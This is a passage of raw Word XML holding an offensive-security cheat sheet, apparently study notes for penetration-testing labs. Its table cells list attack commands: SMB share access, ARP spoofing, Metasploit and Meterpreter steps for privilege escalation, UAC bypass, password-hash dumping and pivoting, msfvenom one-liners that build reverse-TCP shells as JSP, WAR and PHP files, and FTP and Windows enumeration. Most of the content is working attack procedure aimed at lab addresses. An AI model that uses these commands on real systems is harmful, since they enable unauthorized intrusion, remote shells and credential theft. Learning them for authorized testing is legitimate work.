                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="24292E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24292E"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>Access Share</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2194FBEA" w14:textId="359CCDE8" w:rsidR="0019187C" w:rsidRPr="0019187C" w:rsidRDefault="0019187C" w:rsidP="0019187C">
            <w:r>
              <w:t xml:space="preserve"># </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0019187C">
              <w:t>smbclient</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0019187C">
              <w:t xml:space="preserve"> //10.10.10.10/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0019187C">
              <w:t>share_name</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="191E8830" w14:textId="022B775A" w:rsidR="0019187C" w:rsidRDefault="0019187C" w:rsidP="0019187C"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2185" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="435B67BD" w14:textId="795E84B6" w:rsidR="00C36402" w:rsidRDefault="0019187C" w:rsidP="00C36402">
            <w:r>
              <w:t>Windows Share enumeration</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C36402" w14:paraId="208319F6" w14:textId="77777777" w:rsidTr="0019187C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7165" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3A961F4D" w14:textId="77777777" w:rsidR="0019187C" w:rsidRDefault="0019187C" w:rsidP="0019187C">
            <w:r>
              <w:t xml:space="preserve"># </w:t>
            </w:r>
            <w:r>
              <w:t>echo 1 &gt; /proc/sys/net/ipv4/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ip_forward</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="7BEB3F7C" w14:textId="2D908CD9" w:rsidR="00C36402" w:rsidRDefault="0019187C" w:rsidP="0019187C">
            <w:r>
              <w:t xml:space="preserve"># </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>arpspoof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tap0 -t 10.10.10.10 -r 10.10.10.11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2185" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0AEF7C60" w14:textId="23CC97FD" w:rsidR="00C36402" w:rsidRDefault="0019187C" w:rsidP="00C36402">
            <w:r>
              <w:t>ARP Spoofing</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C36402" w14:paraId="4A6B94CE" w14:textId="77777777" w:rsidTr="0019187C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7165" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2EA3950D" w14:textId="77777777" w:rsidR="0019187C" w:rsidRDefault="0019187C" w:rsidP="0019187C">
            <w:r>
              <w:t>search x</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5499DA14" w14:textId="77777777" w:rsidR="0019187C" w:rsidRDefault="0019187C" w:rsidP="0019187C">
            <w:r>
              <w:t>use x</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2D50209C" w14:textId="77777777" w:rsidR="0019187C" w:rsidRDefault="0019187C" w:rsidP="0019187C">
            <w:r>
              <w:t>info</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="75FFD75C" w14:textId="77777777" w:rsidR="0019187C" w:rsidRDefault="0019187C" w:rsidP="0019187C">
            <w:r>
              <w:t>show options, show advanced options</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="025E20A7" w14:textId="72F5EAB1" w:rsidR="00C36402" w:rsidRDefault="0019187C" w:rsidP="0019187C">
            <w:r>
              <w:t>SET X (</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>e.g.</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> set RHOST 10.10.10.10, set payload x)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2185" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="701756D8" w14:textId="28DDB7BF" w:rsidR="00C36402" w:rsidRDefault="0019187C" w:rsidP="00C36402">
            <w:r>
              <w:t>Basic Metasploit commands</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C36402" w14:paraId="0FFDE0AE" w14:textId="77777777" w:rsidTr="0019187C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7165" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5C6C50DE" w14:textId="59BD6F8E" w:rsidR="0019187C" w:rsidRDefault="0019187C" w:rsidP="0019187C">
            <w:r>
              <w:t xml:space="preserve"># </w:t>
            </w:r>
            <w:r>
              <w:t>background</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="42672B57" w14:textId="2AECD631" w:rsidR="0019187C" w:rsidRDefault="0019187C" w:rsidP="0019187C">
            <w:r>
              <w:t xml:space="preserve"># </w:t>
            </w:r>
            <w:r>
              <w:t>sessions -l</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0AF68884" w14:textId="25B3BAC8" w:rsidR="0019187C" w:rsidRDefault="0019187C" w:rsidP="0019187C">
            <w:r>
              <w:t xml:space="preserve"># </w:t>
            </w:r>
            <w:r>
              <w:t>sessions -</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>i</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> 1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2EDFF69D" w14:textId="636363AA" w:rsidR="0019187C" w:rsidRDefault="0019187C" w:rsidP="0019187C">
            <w:r>
              <w:t xml:space="preserve"># </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>sysinfo</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">, ifconfig, route, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>getuid</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="6104A386" w14:textId="6F5657AE" w:rsidR="0019187C" w:rsidRDefault="0019187C" w:rsidP="0019187C">
            <w:r>
              <w:t xml:space="preserve"># </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>getsystem</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> (</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>privesc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0A023841" w14:textId="06967128" w:rsidR="0019187C" w:rsidRDefault="0019187C" w:rsidP="0019187C">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>bypassuac</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="1234D0A9" w14:textId="77777777" w:rsidR="0019187C" w:rsidRDefault="0019187C" w:rsidP="0019187C">
            <w:r>
              <w:t>download x /root/</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0F359BF8" w14:textId="77777777" w:rsidR="0019187C" w:rsidRDefault="0019187C" w:rsidP="0019187C">
            <w:r>
              <w:t>upload x C:\\Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="16AD31E4" w14:textId="77777777" w:rsidR="0019187C" w:rsidRDefault="0019187C" w:rsidP="0019187C">
            <w:r>
              <w:t>shell</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4E109A4B" w14:textId="547FB437" w:rsidR="00C36402" w:rsidRDefault="0019187C" w:rsidP="0019187C">
            <w:r>
              <w:t>use post/windows/gather/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>hashdump</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="42319406" w14:textId="03086F31" w:rsidR="00FA3693" w:rsidRDefault="00FA3693" w:rsidP="0019187C"/>
          <w:p w14:paraId="6D26CC68" w14:textId="77777777" w:rsidR="00FA3693" w:rsidRPr="00FA3693" w:rsidRDefault="00FA3693" w:rsidP="00FA3693">
            <w:pPr>
              <w:rPr>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FA3693">
              <w:rPr>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>CHECK UAC/Privileges</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="047CA639" w14:textId="166C6D33" w:rsidR="00FA3693" w:rsidRDefault="00FA3693" w:rsidP="00FA3693">
            <w:r>
              <w:t xml:space="preserve"># </w:t>
            </w:r>
            <w:r>
              <w:t>run post/windows/gather/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>win_privs</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="3D0196AC" w14:textId="77777777" w:rsidR="00FA3693" w:rsidRDefault="00FA3693" w:rsidP="00FA3693"/>
          <w:p w14:paraId="00FE26A5" w14:textId="77777777" w:rsidR="00FA3693" w:rsidRPr="00FA3693" w:rsidRDefault="00FA3693" w:rsidP="00FA3693">
            <w:pPr>
              <w:rPr>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FA3693">
              <w:rPr>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>BYPASS UAC</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="311D3978" w14:textId="77777777" w:rsidR="00FA3693" w:rsidRDefault="00FA3693" w:rsidP="00FA3693">
            <w:r>
              <w:t>Background the session first</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="49328CE8" w14:textId="74BEDB21" w:rsidR="00FA3693" w:rsidRDefault="00FA3693" w:rsidP="00FA3693">
            <w:r>
              <w:t xml:space="preserve"># </w:t>
            </w:r>
            <w:r>
              <w:t>exploit/windows/local/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>bypassuac</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="33547D3B" w14:textId="121C3A65" w:rsidR="00FA3693" w:rsidRDefault="00FA3693" w:rsidP="00FA3693">
            <w:r>
              <w:t xml:space="preserve"># </w:t>
            </w:r>
            <w:r>
              <w:t>set session</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4B55139B" w14:textId="77777777" w:rsidR="00FA3693" w:rsidRDefault="00FA3693" w:rsidP="00FA3693"/>
          <w:p w14:paraId="19DDEC9D" w14:textId="77777777" w:rsidR="00FA3693" w:rsidRDefault="00FA3693" w:rsidP="00FA3693">
            <w:r>
              <w:t xml:space="preserve">After </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>PrivEsc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="71CB0B90" w14:textId="77777777" w:rsidR="00FA3693" w:rsidRDefault="00FA3693" w:rsidP="00FA3693">
            <w:r>
              <w:t>migrate &lt;</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>pid</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="759E6970" w14:textId="15878CED" w:rsidR="00FA3693" w:rsidRDefault="00FA3693" w:rsidP="00FA3693">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>hashdump</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="7A37542D" w14:textId="77777777" w:rsidR="0019187C" w:rsidRDefault="0019187C" w:rsidP="0019187C"/>
          <w:p w14:paraId="57A93E08" w14:textId="6DFC1179" w:rsidR="0019187C" w:rsidRDefault="0019187C" w:rsidP="0019187C"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2185" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="12BDA209" w14:textId="48577A7A" w:rsidR="00C36402" w:rsidRDefault="0019187C" w:rsidP="00C36402">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>Basic Meterpreter commands</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C36402" w14:paraId="0D55AC69" w14:textId="77777777" w:rsidTr="0019187C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7165" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="06C96080" w14:textId="77777777" w:rsidR="0019187C" w:rsidRPr="0019187C" w:rsidRDefault="0019187C" w:rsidP="0019187C">
            <w:pPr>
              <w:rPr>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0019187C">
              <w:rPr>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>JSP Java Meterpreter Reverse TCP</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7687C558" w14:textId="702DC399" w:rsidR="0019187C" w:rsidRDefault="0019187C" w:rsidP="0019187C">
            <w:r>
              <w:t xml:space="preserve"># </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>msfvenom</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> -p java/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>jsp_shell_reverse_tcp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> LHOST= LPORT= -f raw &gt; </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>shell.jsp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="51AABFAC" w14:textId="77777777" w:rsidR="0019187C" w:rsidRDefault="0019187C" w:rsidP="0019187C"/>
          <w:p w14:paraId="1E880952" w14:textId="77777777" w:rsidR="0019187C" w:rsidRPr="0019187C" w:rsidRDefault="0019187C" w:rsidP="0019187C">
            <w:pPr>
              <w:rPr>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0019187C">
              <w:rPr>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>WAR</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="63DA4E7A" w14:textId="23686614" w:rsidR="0019187C" w:rsidRDefault="0019187C" w:rsidP="0019187C">
            <w:r>
              <w:t xml:space="preserve"># </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>msfvenom</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> -p java/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>jsp_shell_reverse_tcp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> LHOST= LPORT= -f war &gt; </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>shell.war</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="4901874B" w14:textId="77777777" w:rsidR="0019187C" w:rsidRDefault="0019187C" w:rsidP="0019187C"/>
          <w:p w14:paraId="5AB03471" w14:textId="77777777" w:rsidR="0019187C" w:rsidRPr="0019187C" w:rsidRDefault="0019187C" w:rsidP="0019187C">
            <w:pPr>
              <w:rPr>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0019187C">
              <w:rPr>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>PHP</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="34D8B7FB" w14:textId="44126B32" w:rsidR="0019187C" w:rsidRDefault="0019187C" w:rsidP="0019187C">
            <w:r>
              <w:t xml:space="preserve"># </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>msfvenom</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> -p php/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>meterpreter_reverse_tcp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> LHOST= LPORT= -f raw &gt; </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>shell.php</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="1AAF94E9" w14:textId="586022BD" w:rsidR="00C36402" w:rsidRDefault="0019187C" w:rsidP="0019187C">
            <w:r>
              <w:t xml:space="preserve"># </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">cat </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>shell.php</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> | </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>pbcopy</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> &amp;&amp; echo '&lt;?php ' | tr -d '\n' &gt; </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>shell.php</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> &amp;&amp; </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>pbpaste</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> &gt;&gt; </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>shell.php</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2185" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5CF064BE" w14:textId="6D85C0AA" w:rsidR="00C36402" w:rsidRDefault="0019187C" w:rsidP="00C36402">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Msfvenom</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> shells</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C36402" w14:paraId="6FD1E181" w14:textId="77777777" w:rsidTr="0019187C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7165" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="365C50C8" w14:textId="77777777" w:rsidR="0019187C" w:rsidRPr="0019187C" w:rsidRDefault="0019187C" w:rsidP="0019187C">
            <w:r>
              <w:t xml:space="preserve"># </w:t>
            </w:r>
            <w:r w:rsidRPr="0019187C">
              <w:t>run autoroute -s 10.10.10.0/24</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="667D0CD8" w14:textId="0E93E858" w:rsidR="00C36402" w:rsidRDefault="00C36402" w:rsidP="00C36402"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2185" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="66629A9A" w14:textId="74761C54" w:rsidR="00C36402" w:rsidRDefault="0019187C" w:rsidP="00C36402">
            <w:r>
              <w:t>Autoroute</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019187C" w14:paraId="2B1A1124" w14:textId="77777777" w:rsidTr="0019187C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7165" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="49FC4918" w14:textId="32DCC5A8" w:rsidR="0019187C" w:rsidRDefault="00FA3693" w:rsidP="0019187C">
            <w:r>
              <w:t xml:space="preserve"># </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="0019187C">
              <w:t>nmap</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="0019187C">
              <w:t xml:space="preserve"> --script=ftp-anon 10.10.10.10 -p21 -v</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6E8CF65B" w14:textId="20272DE4" w:rsidR="0019187C" w:rsidRDefault="00FA3693" w:rsidP="0019187C">
            <w:r>
              <w:t xml:space="preserve"># </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="0019187C">
              <w:t>nmap</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="0019187C">
              <w:t xml:space="preserve"> -A -p21 10.10.10.10 -v</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="30D3FCB1" w14:textId="77777777" w:rsidR="0019187C" w:rsidRDefault="0019187C" w:rsidP="0019187C"/>
          <w:p w14:paraId="4F91E10D" w14:textId="77777777" w:rsidR="0019187C" w:rsidRPr="0019187C" w:rsidRDefault="0019187C" w:rsidP="0019187C">
            <w:pPr>
              <w:rPr>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0019187C">
              <w:rPr>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>Login to FTP server</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="26A4B710" w14:textId="04BB56E9" w:rsidR="0019187C" w:rsidRDefault="00FA3693" w:rsidP="0019187C">
            <w:r>
              <w:t xml:space="preserve"># </w:t>
            </w:r>
            <w:r w:rsidR="0019187C">
              <w:t>ftp 10.10.10.10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2185" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="180FA42D" w14:textId="17890CA4" w:rsidR="0019187C" w:rsidRDefault="0019187C" w:rsidP="0019187C">
            <w:r>
              <w:t>FTP Enumeration</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="19AA8179" w14:textId="60AA92B5" w:rsidR="00C36402" w:rsidRDefault="00C36402" w:rsidP="00C364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3693" w14:paraId="63C917A6" w14:textId="77777777" w:rsidTr="00FA3693">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="06028E7F" w14:textId="1AE53845" w:rsidR="00FA3693" w:rsidRPr="00FA3693" w:rsidRDefault="00FA3693" w:rsidP="00FA3693">
            <w:r w:rsidRPr="00FA3693">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>To search for a file starting from current directory</w:t>
            </w:r>
            <w:r w:rsidRPr="00FA3693">
              <w:br/>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"># </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00FA3693">
              <w:t>dir</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00FA3693">
              <w:t xml:space="preserve"> /b/s "*.conf*"</w:t>
            </w:r>
            <w:r w:rsidRPr="00FA3693">
              <w:br/>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"># </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00FA3693">
              <w:t>dir</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00FA3693">
              <w:t xml:space="preserve"> /b/s "*.txt*"</w:t>
            </w:r>
            <w:r w:rsidRPr="00FA3693">
              <w:br/>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"># </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00FA3693">
              <w:t>dir</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00FA3693">
              <w:t xml:space="preserve"> /b/s "*filename*"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2B215FB3" w14:textId="2C5835DE" w:rsidR="00FA3693" w:rsidRPr="00FA3693" w:rsidRDefault="00FA3693" w:rsidP="00FA3693">
            <w:r w:rsidRPr="00FA3693">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Check </w:t>
            </w:r>
            <w:r w:rsidRPr="00FA3693">
              <w:t>routing</w:t>
            </w:r>
            <w:r w:rsidRPr="00FA3693">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> table</w:t>
            </w:r>
            <w:r w:rsidRPr="00FA3693">
              <w:br/>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"># </w:t>
            </w:r>
            <w:r w:rsidRPr="00FA3693">
              <w:t>route print</w:t>
            </w:r>
            <w:r w:rsidRPr="00FA3693">
              <w:br/>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"># </w:t>
            </w:r>
            <w:r w:rsidRPr="00FA3693">
              <w:t>netstat -r</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3A612D65" w14:textId="4D4160E5" w:rsidR="00FA3693" w:rsidRPr="00FA3693" w:rsidRDefault="00FA3693" w:rsidP="00FA3693">
            <w:r w:rsidRPr="00FA3693">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Check Users</w:t>
            </w:r>
            <w:r w:rsidRPr="00FA3693">
              <w:br/>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"># </w:t>
            </w:r>
            <w:r w:rsidRPr="00FA3693">
              <w:t>net users</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3D174D97" w14:textId="078206B0" w:rsidR="00FA3693" w:rsidRPr="00FA3693" w:rsidRDefault="00FA3693" w:rsidP="00FA3693">
            <w:r w:rsidRPr="00FA3693">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>List drives on the machine</w:t>
            </w:r>
            <w:r w:rsidRPr="00FA3693">
              <w:br/>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"># </w:t>
            </w:r>
            <w:r w:rsidRPr="00FA3693">
              <w:t xml:space="preserve">wmic </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00FA3693">
              <w:t>logicaldisk</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00FA3693">
              <w:t xml:space="preserve"> get </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00FA3693">
              <w:t>Caption,Description</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00FA3693">
              <w:t>,providername</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="447457C8" w14:textId="77777777" w:rsidR="00FA3693" w:rsidRDefault="00FA3693" w:rsidP="00FA3693"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3E587D3B" w14:textId="77777777" w:rsidR="00FA3693" w:rsidRDefault="00FA3693" w:rsidP="00C36402"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FA3693" w14:paraId="61E477DE" w14:textId="77777777" w:rsidTr="00FA3693">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="349D25A1" w14:textId="77777777" w:rsidR="00FA3693" w:rsidRDefault="00FA3693" w:rsidP="00C36402"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0BB961AA" w14:textId="77777777" w:rsidR="00FA3693" w:rsidRDefault="00FA3693" w:rsidP="00C36402"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FA3693" w14:paraId="6A5733AC" w14:textId="77777777" w:rsidTr="00FA3693">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="14D779EF" w14:textId="77777777" w:rsidR="00FA3693" w:rsidRDefault="00FA3693" w:rsidP="00C36402"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="296D8A16" w14:textId="77777777" w:rsidR="00FA3693" w:rsidRDefault="00FA3693" w:rsidP="00C36402"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FA3693" w14:paraId="535EC437" w14:textId="77777777" w:rsidTr="00FA3693">
        <w:tc>
